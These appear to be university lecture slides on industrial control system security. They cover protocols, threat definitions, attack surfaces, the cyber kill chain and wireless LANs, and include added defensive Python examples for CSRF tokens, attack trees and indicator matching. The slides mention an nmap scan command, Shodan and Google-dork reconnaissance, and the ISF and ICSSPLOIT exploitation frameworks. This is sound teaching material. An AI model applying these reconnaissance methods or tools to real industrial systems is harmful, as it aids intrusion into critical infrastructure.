Protocol                | Physical Layer                 | Comms + Pwr | Data Rate      | No. Devices | DataLink Layer       | Control in field / P2P / Alerts / Timestamp
Modbus - 1979           | IEEE 1452.2, TIA-485           |             | 9.6Kbs-12Mbs   | 247         | NONE                 |
Hart - 1986             | BELL 202                       | 4-20mA      | 1.2Kps-9.6Kps  | 1-64        | NONE                 | X
PROFIBUS DP             | IEEE 1452.2, TIA-485           |             | 9.6Kbs-12Mbs   | 247         | IEC 61158            |
PROFIBUS PA             | IEC 61158                      | X           | 31.25Kbs       | 32          | IEC 61158            | X
PROFINET                | IEC 8802, IEEE802.3            |             | 100Mbs, 1Gbs   | unlimited   | IEC 8802             | X
FOUNDATION FIELDBUS H1  | IEC 61158, ISA SP50, ISA/ANSI  | X           | 31.25Kbs       | 32          | IEC 61158, ISA SP50  | X X X X
FOUNDATION FIELDBUS HSE | IEC 8802, IEEE 802.3           |             | 100Mbs, 1Gbs   | unlimited   | IEC802               | X X X X
SCADA Technologies
Satellite communications

• There are many satellite communications; two common technologies are:
  • Very Small Aperture Terminal (VSAT) - fixed - provides data, video and voice. Operates in C-Band (4-8GHz) and Ka-Band (12-18GHz) - terrestrial satellite
  • Broadband Global Area Network (BGAN) - mobile, low power - supports data and voice - geostationary satellites. L-Band (1.5-1.6GHz), Latency 1-1.5 seconds
SCADA Technologies
RF Mesh Technologies

• Allows participating devices to route data from other devices.
• Technologies include ZigBee, WirelessHART and ISA100.11a
  • WirelessHART makes up about 50-80% of wireless ICS
  • Operates at 2.4GHz, supports channel hopping, secured using keys to prevent spoofing
  • ISA100.11a is similar to WirelessHART, however it supports IPv6, can tunnel legacy protocols and utilises subnets. There was a committee to converge ISA and WirelessHART into a single standard, however, this was abandoned.
• ZigBee operates similarly to Bluetooth, low power, but supports security such as AES; each device has a unique key.
Todays session

• Lecture
• Looking at vulnerabilities, attack surfaces and trees.

• Tutorial
• Seminar: Stuxnet
• Investigate attack surfaces
• Advanced Persistent Threats (APT)
Vulnerabilities to SCADA Systems
Threats
Suitable definitions of threats for ICS

The former ISO 22399:2007 - Guideline for incident preparedness and operational continuity management: “potential cause of an unwanted incident, which may result in harm to individuals, a system or organization, the environment or the community”.

ISO 22313:2014 on Societal security – business continuity management systems: “events or actions that could at some point disrupt activities and resources (e.g. threats such as fire, flood, power failure, staff loss, staff absenteeism, computer viruses and hardware failure)”

NIST SP 800-82 (source: NIST SP 800-53) defines threat as: Any circumstance or event with the potential to adversely impact agency operations (including mission, functions, image, or reputation), agency assets, or individuals through an information system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service.

ISO/IEC 27000 defines threat as the “potential cause of an unwanted incident, which may result in harm to a system or organization”
Many ICS threats stem from differences between IT and OT.

- Combination of legacy technologies with contemporary off-the-shelf technologies (e.g. connection of ICS to the Internet)
- Lack of cyber security awareness in OT
- Increased cost of security
- etc.
Vulnerabilities - Definition

• A vulnerability is a weakness in a system which could be exploited by a threat.
• Not only software, but also physical security, HR practices etc.
• Zero Day Attacks are a commonly exploited vulnerability
Vulnerability Identifiers

• Categories of vulnerabilities for cyber systems are generally defined by Common Weakness Enumeration (CWE)
  • cwe.mitre.org
• Specific vulnerabilities in specific systems are identified by Common Vulnerabilities and Exposures (CVE)
  • nvd.nist.gov/vuln/search
  • cvedetails.com
Attack surface

• The totality of all vulnerabilities in connected hardware and software which can
be accessible to unauthenticated users.
Attack surface
Information leaks

• Information leaks can expose control systems to the public via the internet
• There are a few methods utilised by attackers to identify these systems:
  • Port scanning [can be traced back to the attacker's IP] (nmap) [sudo nmap -p- -A 127.0.0.1]
  • Google searches (exploit-db.com/google-hacking-database) [site:domain.com command] - proceed with caution: look, but do not attempt to access any returned sites.
  • Shodan search
Attack surface
Other information online

• Organisational maps, sharing email addresses (conventions), contacts and relationships
• Third parties, suppliers, associations, regulators and customers
• Assets, names, locations, layouts, utilities (floor plans are really helpful to attackers)
ICS threats
Shodan.IO

ICS knowledge and documentation on ICS services, ICS protocols and their weaknesses is widely available on the internet.

Shodan was launched in 2009.

According to Bodenheim et al. (2014) Shodan indexed and identified all four PLCs, deployed for the purposes of the experiment, within 19 days [2].

https://www.shodan.io/
ICS Threats
Shodan

• Indexes banners and service headers, unlike Google which indexes content.
• Allows attackers to identify services running in an environment
• Can take around 19 days to detect new systems
• Provides the same information as nmap, but remember nmap is traceable
back to the originating IP

• shodan.io/explore/category/industrial-control-systems
ICS threats
Industrial Exploitation Framework, similar to Metasploit

ICS knowledge and documentation on ICS services, ICS protocols and their weaknesses is widely available on the internet.

ISF (Industrial Exploitation Framework) is an exploitation framework based on Python; it's similar to the Metasploit framework.

https://github.com/dark-lbp/isf
ICS threats
ICSSPLOIT

BlackHat 2011 - Siemens S7 PLC Exploitation with Metasploit: https://www.youtube.com/watch?v=33kouEKm0zo

Shodan and ICSSPLOIT …

Remember all the differences between IT and OT…
ICS Threat landscape

• In the period from 1982 to 2000 only 31% of all security incidents against ICSs
were identified as externally generated incidents.

• In the period from 2001 to 2003 external generated incidents accounted for
70% of all security incidents, as a result of the use of emerging technologies
(e.g. wireless networks, connection to the Internet etc.) [1]
ICS Threat landscape

Security for Industrial Control Systems Framework Infographic by NCSC [3]


ICS threats

The main threats to national security are terrorism, espionage, cyber threats and
the proliferation of weapons of mass destruction, many of which impact on the
UK’s national infrastructure [4].

Source: https://www.cpni.gov.uk/national-security-threats
Common Level 0/1 attacks

• Attack surface of
  • Physical components
  • Real Time OS
  • Applications - carry a range of vulnerabilities
  • Communications
  • Supply chain
  • People
Common Level 2 / 3 Attacks

• Level 2/3 subjected to many common attacks:
  • Phishing
  • Malware
  • Viruses
  • Social Engineering
  • Net attacks
  • Eavesdropping
  • DDoS
  • Masquerading
Level 2 / 3 targets

• Level 2 and 3 devices are targeted more often as they:
  • Use common protocols such as TCP/IP
  • Are connected to the process through HMI
  • Technicians' workstations typically have a holistic context of the ICS process, including project files
• Access is often remote, through the ISP, and works through to the control network exploring trust relationships between servers.
Common Attacks

• SQLi Attacks
• Session Management
• Authentication bypass
• Cross site requests
• Passwords and password practices
Authentication bypass

• Most systems have authentication control, requiring a user to authenticate (typically with a username and password),
• Occurs when authentication is incorrectly implemented,
  • for example on a website where the developer fails to verify whether the user is still logged in.
Weak session management

• Once a user authenticates on a system, the system usually issues a session token and a cookie
• This cookie is passed back and forth to verify your credentials
• If the cookie was intercepted it could be used to gain access to that system
SQL Injection

• SQLi attacks are more common than they should be, with a few large names falling victim
• Most data systems link to a backend database
• If the databases are not configured correctly, attackers can add SQL commands within the input fields, which the database will run.
• These attacks allow an attacker to read and write to the database, as well as interact with the OS and files.
Cross-site scripting XSS

• Exploiting input fields on a site, such as a search field
• Allows the attackers to add JavaScript into an input field and have it execute in the browser,
• XSS exploits the browser, and has the ability to do anything to the user's browser; if this is a web application then it has the potential to issue control signals or make configuration changes.
Cross-site Request Forgery (CSRF or XSRF)

• This exploit relies on the principle that the user has authenticated.
• Often a SE attack: the attacker sends the user a link to a website similar to the one below.
  • ‘http//hmi.tesla.com/disconnect?customer=987'
• What if that was a smart meter, or a gantry on a smart motorway?
• If you have an active cookie session then you could disconnect a customer's car
• CSRF tokens are used to limit these types of attacks
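How a CSRF token limits the disconnect link above, as an added example (not code from the slides): the vulnerable handler acts on any request that carries the session cookie, while the hardened one refuses state changes over GET and requires a token HMAC-bound to the session, which a third-party page cannot read. The Session class, the request shape and SECRET_KEY are constructed stand-ins for a real web framework and its configuration.

```python
"""Synchronizer-token defence for a state-changing HMI endpoint.

Added example, not from the slides. Session/request objects stand in for a web
framework, SECRET_KEY is a placeholder and /disconnect mirrors the slide's
'disconnect?customer=987' link.
"""
import hashlib
import hmac
import secrets

SECRET_KEY = b"PLACEHOLDER-server-side-secret"   # assumption: loaded from config in practice


class Session:
    """Server-side session created at login; its id is what the cookie carries."""

    def __init__(self, user: str):
        self.user = user
        self.id = secrets.token_hex(16)


def issue_csrf_token(session: Session) -> str:
    """Token bound to this session via HMAC: a token minted for another session
    (or guessed by a third-party page) will not verify here."""
    return hmac.new(SECRET_KEY, session.id.encode(), hashlib.sha256).hexdigest()


def csrf_token_valid(session: Session, presented) -> bool:
    if not isinstance(presented, str):
        return False
    # Constant-time comparison so the check itself leaks nothing about the token.
    return hmac.compare_digest(issue_csrf_token(session), presented)


def disconnect_vulnerable(session, method: str, params: dict) -> int:
    """The pattern the slide describes: a valid session cookie is all it takes,
    so a GET triggered by a link the victim clicked performs the action."""
    if session is None:
        return 401
    return 200 if params.get("customer") else 400


def disconnect_hardened(session, method: str, params: dict, form: dict) -> int:
    """Same endpoint with CSRF mitigations: no state change on GET, and the POST
    must carry the token issued to this very session."""
    if session is None:
        return 401
    if method != "POST":
        return 405            # a link or image tag can only produce a GET
    if not csrf_token_valid(session, form.get("csrf_token")):
        return 403            # request did not originate from our own page
    return 200 if params.get("customer") else 400


if __name__ == "__main__":
    victim = Session("operator")
    # Cross-site request: cookie present, but no token (the attacker cannot read it).
    print(disconnect_vulnerable(victim, "GET", {"customer": "987"}))        # 200 - acts
    print(disconnect_hardened(victim, "GET", {"customer": "987"}, {}))      # 405 - refused
    # Legitimate form submission from the HMI page that embedded the token.
    form = {"csrf_token": issue_csrf_token(victim)}
    print(disconnect_hardened(victim, "POST", {"customer": "987"}, form))   # 200
```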


Passwords (Default)

• Many systems are still protected by passwords, and most have a default support or admin account / password
• Default passwords are often available within vendor documentation (think about your wireless access point)
• Due to constraints with resources, there may be a single password which is shared with multiple users
• It's quite common to come across passwords which are hardcoded and cannot be changed
Attack methods

How can a spear phishing attack be used against an ICS?

https://www.youtube.com/watch?v=uVAQT_dBEec

Step 1: Open Source Intelligence (OSINT) and identify the spear phishing targets and their emails
Step 2: Find an organization to perform the spear phishing.
Step 3: Find ICS asset owners to participate. They would get the OSINT, spear phishing and analysis at no charge. All results would be anonymized to the asset owner’s satisfaction.

Result of research: 25% of ICS employees fell victim to spear-phishing attempts
Attack methods – Spear Phishing
Modelling attacks
Attack Models and Surface
Attack actors

• Autonomous attackers
• Criminal groups
• Foreign intelligence services
• Insiders
• Terrorists
• Industrial espionage

Incentive? Can we distinguish the actor?
Attack methods

Traditional IT systems-based cyber-attacks (e.g. viruses, worms, spear phishing, social engineering, botnets, rootkits, trojan horses, DDoS etc.)

Spreading mechanisms: emails, USBs, insider threat etc.

Exploit ICS software vulnerabilities (ICSSPLOIT)

Goal: Reprogram controllers
Attack tree

• An attack tree is a formal, methodical way of describing the security of a system.
• Should be kept simple (it is not possible to produce an exhaustive model of all attacks and risks)
• Represents the attacks against the system in a tree structure, with the goal of the attack at the root
• Allows us to better understand where we may need additional controls.
• Attack trees are subjective and should focus on a specific risk
Attack Tree - example
F.Santini (2011)
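An AND/OR attack tree evaluated the way the slides describe, as an added example (this is not Santini's model or the figure on the slide): the root is the "reprogram controllers" goal from the attack-methods slide, the leaves are steps named elsewhere in these slides, and the evaluation finds the attacker's cheapest route and then ranks which single leaf, if mitigated, raises that cost the most, i.e. where an additional control is needed. Leaf costs are constructed effort scores, not measured values.

```python
"""AND/OR attack tree evaluated for the attacker's cheapest route to the root goal.

Added example, not Santini's model nor the slide's figure. The tree reuses goals
and steps named in these slides; leaf costs are constructed effort scores.
"""
from dataclasses import dataclass, field
from math import inf


@dataclass
class Node:
    name: str
    kind: str = "LEAF"                       # "LEAF", "AND" or "OR"
    cost: float = 0.0                        # attacker effort for a LEAF (constructed units)
    children: list = field(default_factory=list)


def min_cost(node: Node, mitigated: frozenset = frozenset()):
    """Return (cost, leaves) for the cheapest way to achieve `node`.
    A mitigated leaf counts as infinitely expensive; OR picks the cheapest child,
    AND needs every child and sums them."""
    if node.kind == "LEAF":
        return (inf, []) if node.name in mitigated else (node.cost, [node.name])
    results = [min_cost(child, mitigated) for child in node.children]
    if node.kind == "OR":
        return min(results, key=lambda r: r[0])
    if node.kind == "AND":
        return sum(r[0] for r in results), [leaf for r in results for leaf in r[1]]
    raise ValueError(f"unknown node kind {node.kind!r}")


def leaf_names(node: Node) -> list:
    if node.kind == "LEAF":
        return [node.name]
    return [name for child in node.children for name in leaf_names(child)]


def rank_controls(root: Node) -> dict:
    """Attacker cost of the cheapest remaining route if each single leaf were
    mitigated; the leaves that raise the cost most are where a control helps most."""
    ranking = {leaf: min_cost(root, frozenset({leaf}))[0] for leaf in leaf_names(root)}
    return dict(sorted(ranking.items(), key=lambda kv: -kv[1]))


# Constructed tree: root goal from the "Attack methods" slide, two routes to it.
REPROGRAM_PLC = Node("Reprogram controllers", "OR", children=[
    Node("Via engineering workstation", "AND", children=[
        Node("Spear-phish a technician", cost=3),
        Node("Pivot over server trust relationships to control network", cost=5),
    ]),
    Node("Via internet-exposed HMI", "AND", children=[
        Node("Locate HMI via Shodan", cost=1),
        Node("Log in with vendor default password", cost=1),
    ]),
])


if __name__ == "__main__":
    cost, path = min_cost(REPROGRAM_PLC)
    print(f"cheapest route costs {cost}: {path}")
    for leaf, new_cost in rank_controls(REPROGRAM_PLC).items():
        print(f"mitigate {leaf!r} -> attacker cost {new_cost}")
```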
Tutorial

• Take a look at the CVE and CWE, Shodan.io, GHDB; review the returned hits and describe an overview of the top few results
  • NOTE: Do not attempt to access/authenticate into any systems for which you do not have permission
• Identify the attack surface for a company of your choosing; what information are you hoping to find? Keep a note of the tools and methods you utilise.
• Discuss Stuxnet - 30 mins (assuming you have done the reading)
Advanced Persistent Threats (APT)

Advanced: They are targeted. They may employ more than one attack method and multiple spreading mechanisms to increase the probability of a successful attack on the target.

Persistent: They operate in stealth mode for a prolonged period of time until they reach the final target. Often they hide their actions from monitoring software.

The six steps of an APT (FireEye [5])

1. The cyber criminal, or threat actor, gains entry through an email, network, file, or application vulnerability and inserts malware into an organization's network. The network is considered compromised, but not breached.
2. The advanced malware probes for additional network access and vulnerabilities or communicates with command-and-control (CnC) servers to receive additional instructions and/or malicious code.
3. The malware typically establishes additional points of compromise to ensure that the cyber attack can continue if one point is closed.
4. Once a threat actor determines that they have established reliable network access, they gather target data, such as account names and passwords. Even though passwords are often encrypted, encryption can be cracked. Once that happens, the threat actor can identify and access data.
5. The malware collects data on a staging server, then exfiltrates the data off the network and under the full control of the threat actor. At this point, the network is considered breached.
6. Evidence of the APT attack is removed, but the network remains compromised. The cyber criminal can return at any time to continue the data breach.
References

• Santini, F. 2011, “Evaluation of Complex Security Scenarios using Defence Trees and Economic Indexes”, Journal of Experimental & Theoretical Artificial Intelligence, no. 24, pp. 1-32.
• Byres, E. and Lowe, J., 2004, October. “The myths and facts behind cyber security risks for industrial control systems”. In Proceedings of the VDE Kongress (Vol. 116, pp. 213-218).
• Bodenheim, R., Butts, J., Dunlap, S. & Mullins, B. 2014, "Evaluation of the ability of the Shodan search engine to identify Internet-facing industrial control devices", International Journal of Critical Infrastructure Protection, vol. 7, no. 2, pp. 114-123.
• https://www.ncsc.gov.uk/guidance/security-industrial-control-systems [Accessed on 13/02/2019]
• https://www.cpni.gov.uk/national-security-threats [Accessed on 13/02/2019]
• https://www.fireeye.com/current-threats/anatomy-of-a-cyber-attack.html [Accessed on 14/02/2019]
• https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dossier.pdf [Accessed on 15/02/2019]
UFCF7P-15-M Critical Systems Security
The Cyber Kill Chain model

This week

• Intelligence-driven computer network defence
• The kill chain model
• Indicators
• Course of action
• Campaign analysis
Advanced Persistent Threats

Advanced: They are targeted. They may employ more than one attack method and multiple spreading mechanisms to increase the probability of a successful attack on the target.

Persistent: They operate in stealth mode for a prolonged period of time until they reach the final target. Often they hide their actions from monitoring software.

The six steps of an APT (FireEye [5])

1. The cyber criminal, or threat actor, gains entry through an email, network, file, or application vulnerability and inserts malware into an organization's network. The network is considered compromised, but not breached.
2. The advanced malware probes for additional network access and vulnerabilities or communicates with command-and-control (CnC) servers to receive additional instructions and/or malicious code.
3. The malware typically establishes additional points of compromise to ensure that the cyber attack can continue if one point is closed.
4. Once a threat actor determines that they have established reliable network access, they gather target data, such as account names and passwords. Even though passwords are often encrypted, encryption can be cracked. Once that happens, the threat actor can identify and access data.
5. The malware collects data on a staging server, then exfiltrates the data off the network and under the full control of the threat actor. At this point, the network is considered breached.
6. Evidence of the APT attack is removed, but the network remains compromised. The cyber criminal can return at any time to continue the data breach.
APT Risk - the need for a new approach

• Technical security controls (IDS, antivirus software etc.) focus on the vulnerability component of risk.
• APTs: Well-resourced and trained adversaries conducting multi-layer intrusion campaigns, targeting highly sensitive economic, proprietary or national security information [1].

Figure: Knowledge about adversaries -> Information superiority / Intelligence -> Decreased likelihood of success (intelligence-driven computer network defence model)


Intelligence-driven computer network defence

• Intelligence-driven computer network defence is a risk management strategy that addresses the threat component of risk, incorporating analysis of adversaries, their capabilities, objectives, doctrine and limitations.
• New understanding of the intrusions themselves, not as singular events, but rather as phased progressions [1].
Intelligence-driven computer network defence

• Kill chain model – the basis of intelligence-driven computer network defence

• Kill chain analysis illustrates that the adversary must progress successfully through each
stage of the chain before it can achieve its desired objective; just one mitigation disrupts the
chain and the adversary [1].

• Objectives:
• Identify phases of intrusion.
• Map adversary kill chain indicators to defender courses of action.
• Identify patterns that link individual intrusions into broader campaigns.
• Understand the iterative nature of intelligence.
The Kill Chain model

• United States Department of Defense describes the kill chain with the stages: Find, Fix, Track, Target, Engage and Assess (F2T2EA).
• The United States Air Force (USAF) has used this framework to identify gaps in Intelligence, Surveillance and Reconnaissance (ISR) capability and to prioritize the development of needed systems.
Indicators and the indicator life cycle

• The fundamental element of intelligence in the Cyber Kill Chain model is the indicator; any piece of information that objectively describes an intrusion.
• Three indicator types:
• Atomic
• Computed
• Behavioural
Atomic indicators

• Atomic indicators are those which cannot be broken down into smaller parts and retain their meaning in the context of an intrusion.
• Typical examples here are IP addresses, email addresses and vulnerability identifiers.

Examples on the slide: [email address], 192.168.1.5, CVE-1999-0067

More on CVE: https://cve.mitre.org/


Computed indicators

• Computed indicators are those which are derived from data involved in an incident.
• Common computed indicators include hash values and regular expressions.
Behavioural indicators

• Behavioural indicators are collections of computed and atomic indicators, often subject to qualification by quantity and possibly combinatorial logic.
• Example: “the intruder would initially use a backdoor which generated network traffic matching [regular expression] at the rate of [some frequency] to [some IP address], and then replace it with one matching the [MD5 hash value] once access was established”
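As an added example (not code from the slides or from Hutchins et al.), the three indicator types above can be turned into detection logic and run over a handful of constructed log lines. The C2 address, sender address, URI pattern and "backdoor" sample are all constructed (the addresses use RFC 5737 documentation ranges); CVE-1999-0067 is the identifier from the atomic-indicator slide. The behavioural check implements the slide's own example: beacon traffic matching a regular expression at a given rate to a given IP, followed by a file with a known hash.

```python
"""Matching atomic, computed and behavioural indicators against constructed logs.

Added example, not part of the lecture. Every address, hash and log line
below is constructed; the "backdoor" sample is a byte string hashed at runtime.
"""
import hashlib
import re
from datetime import datetime, timedelta

# --- Atomic indicators: meaningful on their own ---------------------------
ATOMIC = {
    "ip": {"203.0.113.9"},                   # constructed C2 address
    "email": {"sender@attacker.example"},    # constructed phishing sender
    "cve": {"CVE-1999-0067"},                # identifier shown on the slide
}
ALL_ATOMIC = set().union(*ATOMIC.values())

# --- Computed indicators: derived from incident data -----------------------
BACKDOOR_SAMPLE = b"constructed-backdoor-sample"           # stand-in for a binary
BACKDOOR_MD5 = hashlib.md5(BACKDOOR_SAMPLE).hexdigest()   # hash derived from it
BEACON_RE = re.compile(r"/update\?id=[0-9a-f]{6}$")        # constructed C2 URI pattern

# --- Behavioural qualification: quantity and ordering ----------------------
BEACON_MIN_HITS = 3
BEACON_WINDOW = timedelta(minutes=2)

# Constructed log lines: "<timestamp> <kind> key=value ..."
LOG_LINES = [
    "2024-05-01T10:00:00Z conn src=10.0.0.7 dst=203.0.113.9 uri=/update?id=ab12cd",
    "2024-05-01T10:00:30Z conn src=10.0.0.7 dst=203.0.113.9 uri=/update?id=ef34ab",
    "2024-05-01T10:01:00Z conn src=10.0.0.7 dst=203.0.113.9 uri=/update?id=cd56ef",
    "2024-05-01T10:02:00Z conn src=10.0.0.8 dst=198.51.100.4 uri=/index.html",
    f"2024-05-01T10:05:00Z file host=10.0.0.7 path=C:/Users/eng/svchost32.exe md5={BACKDOOR_MD5}",
    "2024-05-01T10:06:00Z mail from=sender@attacker.example to=eng@plant.example",
]


def parse(line: str) -> dict:
    """Split one constructed log line into a dict of fields plus ts and kind."""
    ts, kind, rest = line.split(" ", 2)
    fields = dict(kv.split("=", 1) for kv in rest.split(" "))
    fields["ts"] = datetime.fromisoformat(ts.replace("Z", "+00:00"))
    fields["kind"] = kind
    return fields


EVENTS = [parse(line) for line in LOG_LINES]


def match_atomic(events) -> set:
    """Atomic indicators match by plain equality on any field value."""
    return {v for e in events for v in e.values() if isinstance(v, str) and v in ALL_ATOMIC}


def match_computed(events) -> list:
    """Computed indicators match by regex on URIs and by hash on file events."""
    hits = []
    for e in events:
        if e["kind"] == "conn" and BEACON_RE.search(e.get("uri", "")):
            hits.append(("beacon-uri", e))
        if e["kind"] == "file" and e.get("md5") == BACKDOOR_MD5:
            hits.append(("backdoor-md5", e))
    return hits


def match_behavioural(events) -> bool:
    """The slide's example: >= BEACON_MIN_HITS beacons matching BEACON_RE to the
    C2 IP inside BEACON_WINDOW, then the backdoor hash appearing on that host."""
    beacons = [e for e in events
               if e["kind"] == "conn" and e.get("dst") in ATOMIC["ip"]
               and BEACON_RE.search(e.get("uri", ""))]
    for i, first in enumerate(beacons):
        window = [b for b in beacons[i:] if b["ts"] - first["ts"] <= BEACON_WINDOW]
        if len(window) >= BEACON_MIN_HITS:
            host, last_ts = first["src"], window[-1]["ts"]
            return any(e["kind"] == "file" and e.get("host") == host
                       and e.get("md5") == BACKDOOR_MD5 and e["ts"] > last_ts
                       for e in events)
    return False


if __name__ == "__main__":
    print("atomic:", match_atomic(EVENTS))
    print("computed:", [name for name, _ in match_computed(EVENTS)])
    print("behavioural:", match_behavioural(EVENTS))
```

Note how the behavioural rule is strictly stronger than its parts: with only two beacon lines the computed and atomic indicators still fire, but the behavioural indicator does not, which is the quantity qualification the slide refers to.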
Indicator life cycle states and transitions
Intrusion Kill Chain

• Intrusion:
- aggressor must develop a payload to breach a trusted boundary,
- establish a presence inside a trusted environment,
- take actions towards their objectives (moving laterally inside the environment or violating the confidentiality, integrity, or availability)

• Intrusion (Cyber) Kill Chain:
- reconnaissance, weaponisation, delivery, exploitation, installation, command and control (C2), and actions on objectives.
Intrusion Kill Chain - Reconnaissance

• Research, identification and selection of targets, often represented as crawling Internet websites such as conference proceedings and mailing lists for email addresses, social relationships, or information on specific technologies.

1. Passive Reconnaissance: gathering information about the target without the target being aware of it.

2. Active Reconnaissance: much deeper profiling of the target, which might trigger an alert at the target [2].
Intrusion Kill Chain - Reconnaissance

    Type of Reconnaissance                 Technique   Techniques Used
 1  Target Identification and Selection    Passive     Domain names, whois, records from APNIC, RIPE, ARIN
 2  Target Profiling
    (a) Target Social Profiling            Passive     Social networks, public documents, reports and corporate websites
    (b) Target System Profiling            Active      Ping sweeps, fingerprinting, port scanning and services
 3  Target Validation                      Active      SPAM messages, phishing mails and social engineering
Intrusion Kill Chain - Reconnaissance

• Research, identification and selection of targets, often represented as crawling Internet websites such as conference proceedings and mailing lists for email addresses, social relationships, or information on specific technologies.

• Examples of reconnaissance in ICS environments?


Intrusion Kill Chain - Weaponization

• Coupling a remote access trojan with an exploit into a deliverable payload, typically by means of an automated tool (weaponizer).

• Client application data files such as Adobe Portable Document Format (PDF) or Microsoft Office documents serve as the weaponised deliverable.

• Weaponizer examples in ICS?


Intrusion Kill Chain - Delivery

• Transmission of the weapon to the targeted environment. The three most prevalent
delivery vectors for weaponised payloads by APT actors are:

- email attachments,
- websites, and
- USB removable media.

• Can you identify the prevalent transmission mechanisms in ICS?


Intrusion Kill Chain - Exploitation

• After the weapon is delivered to the victim host, exploitation triggers the intruders’ code. Most often, exploitation targets an application or operating system vulnerability, but it could also more simply exploit the users themselves or leverage an operating system feature that auto-executes code.

• Attack against the user or attack against the system?


Intrusion Kill Chain - Installation

• Installation of a remote access trojan or backdoor on the victim system allows the adversary to maintain persistence inside the environment.

• Any examples of the Installation phase in ICS?


Intrusion Kill Chain - Command and Control (C2)

• Typically, compromised hosts must beacon outbound to an Internet controller server to establish a C2 channel. Once the C2 channel is established, intruders have “hands on the keyboard” access inside the target environment.

• What is the difference in ICS?


Intrusion Kill Chain - Actions on Objectives

• Typically, this objective is data exfiltration, which involves collecting, encrypting and extracting information from the victim environment; violations of data integrity or availability are potential objectives as well. Alternatively, the intruders may only desire access to the initial victim box for use as a hop point to compromise additional systems and move laterally inside the network.

• What is the difference in ICS?


Course of action - example

Use of Intrusion Kill Chain Model

• Defenders must be able to move their detection and analysis up the kill chain and, more importantly, to implement courses of action across the kill chain.
• Force an adversary to change every phase of their intrusion in order to successfully achieve their goals; increase the cost for the adversary.
• Equally important is synthesis of unsuccessful intrusions: what might have happened should future intrusions circumvent the currently effective protections and detections.

Campaign analysis

• The principal goal of campaign analysis is to determine the patterns and behaviors of the intruders, their tactics, techniques, and procedures (TTP), to detect “how” they operate rather than specifically “what” they do.
• As defenders study new intrusion activity, they will:
• either link it to existing campaigns
• or perhaps identify a brand new set of behaviors of a theretofore unknown threat and track it as a new campaign
ICS Cyber kill chain model

• Cyber attacks on industrial control systems (ICS) differ in impact based on a number of factors, including the adversary’s intent, their sophistication and capabilities, and their familiarisation with ICS and automated processes.

• ICS Cyber Kill Chain is broken into two stages:
- Stage 1: Cyber intrusion preparation and execution
- Stage 2: ICS attack development and execution
ICS Cyber kill chain model: Stage 1

• Traditionally classified as espionage or an intelligence operation.
• Very similar to Lockheed Martin’s cyber kill chain model.
• Purpose:
- gain access to information about the ICS,
- learn the system,
- provide mechanisms to defeat internal perimeter protections or gain access to production environments.
• Can be a critical phase for the planning and execution of Stage 2.
• A significant amount of information about the ICS and the industrial process, engineering and operations exists in Internet-facing networks such as corporate or enterprise networks.
• An attacker may perform Stage 1 against a supplier or partner network to gain necessary information.
• Stage 1 can be bypassed in case of Internet-facing ICS components.
• Unintended effects of Stage 1 attacks (e.g. port scanning can lead to communication disruption) [3]
ICS Cyber kill chain model: Stage 2

Attack development and tuning

• Aggressor develops a new capability tailored to affect a specific ICS implementation and for the desired impact.
• Difficult to detect.
• There may also be significant lag between Stage 1 and Stage 2 operations due to the need for prolonged development and testing time. This lag can give the defender time to break the chain…
Validation

• Attacker tests his/her capability on similar or identically configured systems if the capability is to have any meaningful and reliable impact.
• The adversary may acquire physical ICS equipment and software components.
• While it is difficult for most defenders to have insight into the ICS vendor community, various government organisations can utilise their sources and methods to identify unusual acquisitions of such equipment that may indicate a Stage 2 attack for an already established Stage 1 operation.
ICS attack

• The adversary will deliver the capability, install it or modify existing system functionality, and then execute the attack.
• The attack may have many facets (preparatory or concurrent attacks) that fall into the attack categories of enabling, initiating or supporting to achieve their ultimate effect. These may be necessary to trigger conditions needed to manipulate a specific element of the process, initiate changes in process set points and variables or support the attack over time by such tactics as spoofing state information to fool plant operators into thinking everything is normal [3].
• The most common methods to achieve functional impact fall into three categories: loss, denial and manipulation.
- loss of view,
- denial of view,
- manipulation of view,
- denial of control,
- loss of control,
- manipulation of control,
- activation of safety,
- denial of safety,
- manipulation of safety and
- manipulation of sensors and instruments
Wider reading

• FireEye Report provided invaluable incident response insight (fireeye.com)
• Dragos Report provides necessary ICS context in regard to SIS operation and adversary kill chain mapping (dragos.com)
• Schneider Electric Security Notification Document provides vendor recommendations and a reference point for customers to pursue ongoing discussions (schneider-electric.com)
• NCCIC Malware Analysis Report provides two execution flow diagrams and a brief reference to some program capability regardless of key switch position (https://us-cert.cisa.gov/ncas)
References

• [1] Hutchins, E.M., Cloppert, M.J. and Amin, R.M., 2011. Intelligence-driven computer network defense informed by analysis of adversary campaigns and intrusion kill chains. Leading Issues in Information Warfare & Security Research, 1(1), p.80.
• [2] Yadav, T. and Rao, A.M., 2015, August. Technical aspects of cyber kill chain. In International Symposium on Security in Computing and Communication (pp. 438-452). Springer, Cham.
• [3] https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297 [Accessed on 24/02/2020]
Wireless LAN Security and
Forensics
Lecture Overview
• Introduction to Wireless
• Components of WLANs
• WLAN Operation
• WLAN Threats
• Secure WLANs
Types of Wireless Networks
• Wireless Personal-Area Network (WPAN) – Low power and short-range
(20-30ft or 6-9 meters). Based on IEEE 802.15 standard and 2.4 GHz
frequency. Bluetooth and Zigbee are WPAN examples.
• Wireless LAN (WLAN) – Medium-sized networks up to about 300 feet.
Based on IEEE 802.11 standard and 2.4 or 5.0 GHz frequency.
• Wireless MAN (WMAN) – Large geographic area such as a city or district.
Uses specific licensed frequencies.
• Wireless WAN (WWAN) – Extensive geographic area for national or global
communication. Uses specific licensed frequencies.
Wireless Technologies
Bluetooth – IEEE WPAN standard used for device pairing at up to 300ft (100m) distance.
• Bluetooth Low Energy (BLE) – Supports mesh topology to large-scale network devices.
WiMAX (Worldwide Interoperability for Microwave Access) – Alternative to broadband wired internet connections. IEEE 802.16 WLAN standard for up to 30 miles (50 km).
Wireless Technologies (Cont.)
Cellular Broadband – Carries both voice and data. Used by phones, automobiles, tablets, and laptops.
• Global System of Mobile (GSM) – Internationally recognised
• Code Division Multiple Access (CDMA) – Primarily used in the US.
Satellite Broadband – Uses a directional satellite dish aligned with a satellite in geostationary orbit. Needs a clear line of sight. Typically used in rural locations where cable and DSL are unavailable.
802.11 Standards
802.11 WLAN standards define how radio frequencies are used for wireless links.

IEEE Standard   Radio Frequency   Description
802.11          2.4 GHz           Data rates up to 2 Mb/s
802.11a         5 GHz             Data rates up to 54 Mb/s; not interoperable with 802.11b or 802.11g
